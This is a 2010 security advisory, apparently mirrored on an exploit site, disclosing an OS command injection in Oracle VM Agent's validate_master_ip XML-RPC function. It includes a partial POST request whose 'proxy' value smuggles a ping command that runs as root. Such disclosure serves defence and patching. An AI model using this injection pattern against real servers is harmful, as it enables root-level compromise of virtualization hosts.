Oracle Virtual Server Agent Command Injection

ID 1337DAY-ID-14467
Type zdt
Reporter Nahuel Grisolia
Modified 2010-10-14T00:00:00


Exploit for unix platform in category remote exploits

Oracle Virtual Server Agent Command Injection

1. Advisory Information
Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release
2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
3. Software Description
Oracle VM is server virtualization software which fully supports both
Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost
server virtualization that is three times more efficient than existing
server virtualization products from other vendors. Oracle has also
announced certification of key Oracle products including Oracle
Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real
Application Clusters with Oracle VM.
Oracle VM Manager communicates with Oracle VM Agent to create and manage
guests on an Oracle VM Server. Oracle VM Agent is installed and
configured during the installation of Oracle VM Server.
By default, Oracle VM Agent is executed, with a highly privileged user,
typically root.
4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.
5. Vulnerable packages
We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle
VM Agent 2.3.
6. Non-vulnerable packages
Patch set 2.2.1 and above
7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at- ).
8. Technical Description
8.1. OS Command Injection
CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Oracle VS Agent is prone to a remote command execution vulnerability
because the software fails to adequately sanitize user-supplied input.
Oracle VS Agent exposes through XML-RPC several functions. One of these
functions is validate_master_ip, which receives four parameters. The
second parameter "proxy", is vulnerable to command injection, because it
is not properly sanitized and its content is concatenated in an
operative system command, executed as a highly privileged user
(typically root).
The following POST message can be sent to the VM Agent XML-RPC port. By
doing this, the ping command is executed as follows:
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416
<?xml version="1.0"?>
<value><string>'; ping –c 10 localhost; '</string></value>
9. Report Timeline
 2010-09-24 / Bonsai provides vulnerability information to ORACLE
 2010-09-29 / Oracle confirms the vulnerability
 2010-10-12 / Oracle published Critical Patch Update Fix
 2010-10-13 / Public Disclosure

# [2018-03-14]  #